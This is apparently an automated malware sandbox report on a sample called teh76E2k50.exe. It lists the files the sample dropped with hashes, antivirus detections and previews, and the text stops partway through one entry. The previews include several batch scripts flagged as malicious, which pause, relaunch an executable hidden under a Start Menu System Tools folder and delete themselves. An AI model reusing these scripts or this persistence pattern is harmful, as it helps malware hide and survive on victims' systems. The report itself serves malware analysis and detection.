                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................;.........N.;.. ....<...@.. .......................@<...........@...................................;.K.....<.p.................... <...................................................... ............... ..H............text...T.;.. ....;................. ..`.rsrc...p.....<.......;.............@....reloc....... <.......;.............@..B................0.;.....H..................o.........1.z.;......................................0..........(.... ........8........E........*...N.......8....*(.... ....~w...{t...:....& ....8....(.... ....~w...{r...9....& ....8....(.... ....~w...{....:....& ....8y......0..)....... ........8........E................>...........8....~....9.... ....~w...{....9....& ....8.......... ....8....~....(N... .... .... ....s....~....(R....... ....~w...{....:e...& ....8Z...8*... ....~w...{....:A...& ....86...r...

                                                        C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\81acb8af1bb493

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with very long lines (509), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):509
                                                        Entropy (8bit):5.8708539501272
                                                        Encrypted:false
                                                        SSDEEP:12:ls2Hu0nIDzd1otvC/VWMxyglC1zqvP4DGKAb:ejvc6dkgMzoP4GLb
                                                        MD5:DB058200280DAF07361950FD6F019461
                                                        SHA1:307DABDDB86083F2323BC9865FE2A8AE0220C8F3
                                                        SHA-256:BBCEA2911D496B2EDA9CDE5F83CED8E5DF7F88DA2806894494654563939DC318
                                                        SHA-512:38F7320B2A938AC618CD1498034A62055AC8EEDD48478A15AD94A3FD3B72B3AFEC146200C9CB4A3614CC3FC7B05EBD4017A7FEBA4A9DEC3A50A16A7AEC98F546
                                                        Malicious:false
                                                        Preview:lzMNvvMraF2GqkUbsDeurwuvI8OdsxITDAaDBg21ysIeWMfbZUxyc4xzEbFwhs9m7iDpJRaLKm59oQY5dwEX9T1INl8kaFUGsfhxJzRH4ln09yKyCJTuolnnq4ciT0vFRzQJtkwnf6dYqBJYaJhRwjbH23HOXtyE0hiJhBFbWpPrHO6ovDHJSeSrXJQzdiPvIZiId90ZEG4HUt9n6ccUlovVP0vYuP8yZdjrqyLvMsFMkLXnJn2BF5JeoM3nOcoyHFr1KR6IRrH3ijvDdHOHW7sdTFDe4ihtEREeegd2qutYyQ5Fa0KGOhbKWNhFNcNsJXzReRj6oVamNUpCJ8DEYbfgz3HQ8YoOgAOabokJRNb2Hy7Cie5PYJUs2SbkJS8QrLGMFPlfX4wK9mZA6FrdcZ0WqghIMAA8OLL5sv6S3a1eWKtP3anDkexRVtgjrdSX3y6xbdSLJZkCiV9fxROwW7XuY3k9PXkZHdkiO5yaIc3L4ut9tAvaOfA6aLYi2

                                                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................;.........N.;.. ....<...@.. .......................@<...........@...................................;.K.....<.p.................... <...................................................... ............... ..H............text...T.;.. ....;................. ..`.rsrc...p.....<.......;.............@....reloc....... <.......;.............@..B................0.;.....H..................o.........1.z.;......................................0..........(.... ........8........E........*...N.......8....*(.... ....~w...{t...:....& ....8....(.... ....~w...{r...9....& ....8....(.... ....~w...{....:....& ....8y......0..)....... ........8........E................>...........8....~....9.... ....~w...{....9....& ....8.......... ....8....~....(N... .... .... ....s....~....(R....... ....~w...{....:e...& ....8Z...8*... ....~w...{....:A...& ....86...r...

                                                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\teh76E2k50.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):1698
                                                        Entropy (8bit):5.367720686892084
                                                        Encrypted:false
                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                        MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                        SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                        SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                        SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1915
                                                        Entropy (8bit):5.363869398054153
                                                        Encrypted:false
                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHpHNpaHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1Jtpaq2
                                                        MD5:73E7DD0D3AE6532ADBC6411F439B5DE3
                                                        SHA1:427BE8DB5338D856906C1DDFBD186319A02F7567
                                                        SHA-256:A80934D9E4D8FC0BBE46BD76A4FE0F66125C03B5A8F83265420242BE975DC8EE
                                                        SHA-512:33FD10A43B9E16EAF568113F7298D34A730D9040693473A15739AED86228828095E42E16617D06F52363F970D517AD7D052FE520A9924EEC0A93F657CB631855
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                        C:\Users\user\AppData\Local\Temp\4Oz4cSUDT9

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.213660689688186
                                                        Encrypted:false
                                                        SSDEEP:3:O0C5M6f4W:O0CS4
                                                        MD5:537A8666919E8656B242AEA480E905C2
                                                        SHA1:EAAA2CD2AC6413897414FD8427AE76D9A77416FD
                                                        SHA-256:8FBCA6DE4576111E3DB0FED5965710F6D891E1011C8C7A42BE8D2E336FA22C9E
                                                        SHA-512:3D5F2DA9468950E9B01EC11FB255527E99A2F3ACB566A6C2767E475A6B14F8FE893B51647FA0E96BBF7868B9206B8C3A02FAA56674B8D971F96D99A4E2599959
                                                        Malicious:false
                                                        Preview:LbEeQwgb9MjQ7FJTqHBwTnOTu

                                                        C:\Users\user\AppData\Local\Temp\7Yoka0FAeT

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.403856189774723
                                                        Encrypted:false
                                                        SSDEEP:3:neXqkCye:neaL3
                                                        MD5:30DC6C20F547862AF924588A2F58A0A7
                                                        SHA1:5CE9FDADA77451B21A36A0C8B073DC9F293B4196
                                                        SHA-256:1B7FA7E7DE22E71A6D4A008B51267F295AF1F70FD913FD66EB8DBD058F738D4F
                                                        SHA-512:27AA743D7F26CA91E8A6F14D9348A5325B77571F795D3CB580D6E87D17CBB8EDFC4EDA6F726B88F047ABDE0D1160DDDE8B24D87FC548B0ABA93E1D41D53A9C8B
                                                        Malicious:false
                                                        Preview:Shy89FNafuTgpn6GzC0CTsKux

                                                        C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.28344255759202
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fKtkhn:HTg9uYDEiHAJIFn
                                                        MD5:425B95C4CE0FBF70915F6B2D7BB2D252
                                                        SHA1:52B8EB53276FA5009C9BF12F12841507848A6DEA
                                                        SHA-256:532A1ABB4B0284062B00EF72DDC1FFDB8CFB96598C9B871125E66367D156D43A
                                                        SHA-512:F040A9803EA7D0A2B3A24FEC9CECF41873C76F54A13DF24E0BC9A3A395BA505A0D4A6EEE2AEA4200358A823877AAA9D99CD2E2C3E5EC0C05A9A39D7E2800E11F
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8JExSyzmRo.bat"

                                                        C:\Users\user\AppData\Local\Temp\D5NfXEMzXI

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.243856189774724
                                                        Encrypted:false
                                                        SSDEEP:3:eLQNk3Iv:e0h
                                                        MD5:4BF40B3272282CA0814D1A9E5D57A007
                                                        SHA1:4A2AB02ABA5ED7929DC6B2AEDC1040F47855B7DC
                                                        SHA-256:F4E932702616A48E94A83075230D7FAFE604CB0333B27650ABA30A3033DC94E6
                                                        SHA-512:8F5997122AD10C12B5E9980A59DCF9F3F781D1B6B09BA6DCC14C1FBD87C38BBDBDD2B81E264D638E8AB488CB49DCB4BD070CC93139A0833FCC46D2C44CA70763
                                                        Malicious:false
                                                        Preview:ddyZnuu5EiHqCkK1b0Ak2BmKE

                                                        C:\Users\user\AppData\Local\Temp\DN0qgdK33d

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):3.943465189601647
                                                        Encrypted:false
                                                        SSDEEP:3:xiU9jwkS3V:z0B
                                                        MD5:4D0C759621CFC73EDBB9F5F8917C18A5
                                                        SHA1:3ADA733B2BC2FD151268157F0A48DD36AF503B5B
                                                        SHA-256:2877DF1D5C769C34C61AD19E228664F1952A9A4C479C4062E4B2714E3AD17BBB
                                                        SHA-512:CEE5E4659FBF07FD5DB4FCCB0ECD0C465AD0C367D4386B114A5AB2CFD5F3CFD1FDBC0074D0BAC0F441BF047F0164B4014EE9A00499288C8E610B9A32A07098C9
                                                        Malicious:false
                                                        Preview:sxsugu7g1XU31LAwZZnwZ192Y

                                                        C:\Users\user\AppData\Local\Temp\FAszyGTxO8

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.163856189774724
                                                        Encrypted:false
                                                        SSDEEP:3:GNG/1BIeh+n:GNr5n
                                                        MD5:A6DC12D2405C32D469FA3D531F664746
                                                        SHA1:9CC3C08BCADA784E6EF8E822AF38C246356712C2
                                                        SHA-256:7CE4B4A5D7F8A6E39CCAF11F4B692B9CFC305729A20018BF2617A247ADD7D05E
                                                        SHA-512:803D8B131D7E15D404C5D46FFCB4169C56EBF86EECCEACD515BFB6E00C9DEB5371CC1BEFA7B8036A35D74D53CBEB51DA9BDE39601215287F8C89FCC6D1465CAC
                                                        Malicious:false
                                                        Preview:PzRnmlZpscEf5OcGZlmdMDz4E

                                                        C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):212
                                                        Entropy (8bit):5.350610456979711
                                                        Encrypted:false
                                                        SSDEEP:6:hCRLuVFOOr+DE1JzmRXDJzPFKJSKOZG1923fRjS9h:CuVEOCDEiHAJIqh
                                                        MD5:19E8CCD308C0C0360B6D6DF5DD16787E
                                                        SHA1:17C887BEE3409CD54D04C7BE802C90E781DB242C
                                                        SHA-256:635AABCC7B1BC9F45064197527F705C7D04AD09AEF0723D9F9FF42D795A23FB0
                                                        SHA-512:2A478A3762E680BD811F7B39E8555F836E8FE4966398B9D5A9E8D8F2D5AD03C207391880DBD55BD1FAE4A4AD9022A9664BFEE4C44E0D3E25C744B4EE17B3CF6C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\HL35FbYWw1.bat"

                                                        C:\Users\user\AppData\Local\Temp\MOllkmCF6h

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.243856189774724
                                                        Encrypted:false
                                                        SSDEEP:3:yDwcVB4GQGn:yEcT4Yn
                                                        MD5:9CB878524E7413D52F5482A7A366EAF8
                                                        SHA1:2A6BE6C058D74A44F7826A0A800D3785E957742F
                                                        SHA-256:18CC1BCB7A6BF53B0B424E69A7463631A53D578C89FC357FA1F21FBE653E5A24
                                                        SHA-512:04F05582306C1F4B0E322C9DF3488AFF317D55D9316007B49C1E1E6058278244FA30B57C408CC7F00C0A81491B72E90ED5FD875F411AC0FE4675C77BE9026988
                                                        Malicious:false
                                                        Preview:QnfOn3Ax90Wv1bZu7Uxab9jjc

                                                        C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.241995508250854
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fGH:HTg9uYDEiHAJI+H
                                                        MD5:A120B5212E2448F02BE0071123B9317D
                                                        SHA1:9BE71A38EFD247D4B5B93853F8520DDBC6894DBE
                                                        SHA-256:1595A1A6DB71EE703680123629C247B7D45CCB523C3C7837D2924B4EF5E2C5D7
                                                        SHA-512:3A2DE3C680A6ECB0E8D020854148F217FD0F71282D11D8DDEC65811E41C178FC456D5A7FA624ECEC9E69782953FEE885FD9E25254429532244053669C6B13445
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TCMSovEgtl.bat"

                                                        C:\Users\user\AppData\Local\Temp\YXiAFuElS9

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.053660689688185
                                                        Encrypted:false
                                                        SSDEEP:3:Zk1V7sT:wS
                                                        MD5:956F17A1233AB323A3B2B056F1547595
                                                        SHA1:8B654AAAC5C0FC069DBA6349E108903F7AB1B9E3
                                                        SHA-256:B8B197179FAC99E2889BEFD388BA7789FD493CC82B7E3F3D78B327D35D02BCDC
                                                        SHA-512:A84D7C0A228C8F9E414B47B4CEC4E6F748E936BD1000047BC9F552C011502A6E6251D3EE4FD395989E672A7D28F56416877F0E2531B72000140CDA53DA0B4161
                                                        Malicious:false
                                                        Preview:kS5LlETAAelqzgpbRlImvELI5

                                                        C:\Users\user\AppData\Local\Temp\d42RoYfj2g

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.133660689688186
                                                        Encrypted:false
                                                        SSDEEP:3:2K9dN5cZWJn:L9P2WJ
                                                        MD5:A87E43A284F8887978252E4DF3ECCCD4
                                                        SHA1:86FE804DBB48CAD83ED8645734C8FB1C958C91B5
                                                        SHA-256:799101D8F646A4661CE6240E00A3969F71D385A363C4734960469D807B453805
                                                        SHA-512:C89384B16ADB154D14C12812CD381EC0D8795254547ED1E731346D11CD68804C781C25992462D9B6156B24432B52FE1FF2CB96709E2B489597F13DB86D2BE749
                                                        Malicious:false
                                                        Preview:ABxpdcxnlxhLKykHS7TXpLohl

                                                        C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.271345453639224
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fZEnG:HTg9uYDEiHAJIxsG
                                                        MD5:A5A4A7BAAEDF332A6F18563EDF4D06F0
                                                        SHA1:DD9807C52392A084F5BF28F00E74451C6D999A7F
                                                        SHA-256:3149FA34AD59AD747B92A067610E3B3D2557E1CE7AEFCB7A12D8705A04961BA7
                                                        SHA-512:F3815FDE2C4682712C7B5F91F2878BE9A767622EAD877B83A5D49AC6C8EC1EC9CB82D280FB582DA44B798290480A27840A7C5D466B76913BDA97117AC79EC521
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\dxSYZSKoEG.bat"

                                                        C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):212
                                                        Entropy (8bit):5.317499372033229
                                                        Encrypted:false
                                                        SSDEEP:6:hCRLuVFOOr+DE1JzmRXDJzPFKJSKOZG1923fnsoh:CuVEOCDEiHAJIEG
                                                        MD5:72796FA750DB6765A34A46A978B515C7
                                                        SHA1:C5AAA3C0441277E3AFA61C21A3DB3152E44FC958
                                                        SHA-256:E24AA8251D2D507C8A620AF6A78168F2E1A8DE517B0DA2AB73A03E41DD1E3473
                                                        SHA-512:905F658D295883B28611240EAD44CCCA47BF0AB535BC6A49AA81C95A20341FB2D5EE724E080718D8784CEF955DFC8BDC53D577FA46E4E521FB9EA74F8F2F7DED
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ibWrXDwbZz.bat"

                                                        C:\Users\user\AppData\Local\Temp\lcWD716H1R

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.163856189774723
                                                        Encrypted:false
                                                        SSDEEP:3:hEWQCxn:Su
                                                        MD5:9EE45E4163FDEF089A81A946B2EA7597
                                                        SHA1:BE79E23E88EF8E61DE4FE2DCC093A951A901A259
                                                        SHA-256:90E641B4F637EB310FA2DE8686472B61F7A67572349566E86764F3367A8D0B15
                                                        SHA-512:FA32C8C42908212923ABF87755C1859EAF0AA6D286E0ABADBCDF7C3C21E974A00C18B2496BC653022C09B72B173EF13139CD540AD970D35CB6349A9EA282C199
                                                        Malicious:false
                                                        Preview:BzNyBMPa3wLiCbPQNTo8CDjDT

                                                        C:\Users\user\AppData\Local\Temp\tAlK2upyiu

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.243856189774723
                                                        Encrypted:false
                                                        SSDEEP:3:6kdM32n:6km32
                                                        MD5:233F71DF1CC26E98EFF30BD3C9A27A31
                                                        SHA1:3C0E847730DC84AC96D988276CBAF5871AC8F1F8
                                                        SHA-256:DA9112E0D38F3C9861D8B5B1D4050B2982A2E7E4CC6D2D6CF82D042BCB7D1B1E
                                                        SHA-512:7C43CF2D4556F5A10F8E24E2F8A26EBD3CA528DEA5C3A22EF8CBE06659542694829CA291F6117F442E532479C40A2F76C5FA751EC1C421DC73C330866928E3E6
                                                        Malicious:false
                                                        Preview:RafAxpoVNR7P3ZkTiNAwvtfib

                                                        C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.268442040169365
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fBDkRH:HTg9uYDEiHAJIdq
                                                        MD5:2BA3BB9354286C8A172244F3F3870033
                                                        SHA1:3080741D37E44AD86E79CA680B3DC85FEBDF25B5
                                                        SHA-256:0D81D4B75CFA4F42A1BDF1391647C9CE6D2089F7E1157A70E24921009BCBF119
                                                        SHA-512:DFCD4E14545D47E66CB8BD45FE13EA6970D073D5106CE2BC8394A9C6672EA06B7A74F340D2ED4048D2DDDE0FC4AF51E1467EEE8157761416E7BD93C44860C495
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\tOMWzubzd4.bat"

                                                        C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):212
                                                        Entropy (8bit):5.316722027522001
                                                        Encrypted:false
                                                        SSDEEP:6:hCRLuVFOOr+DE1JzmRXDJzPFKJSKOZG1923ftpq:CuVEOCDEiHAJIHq
                                                        MD5:4A1B587AF322EEAFFD0608FEFE8EB6F0
                                                        SHA1:ABE126D01F693F29F2BE1E308CAD45B4493DDBBE
                                                        SHA-256:E83BF55BAF4F34B324E39DC9E94A42D270F09CCCA8D4BE0D68FA5C4AB6EC0475
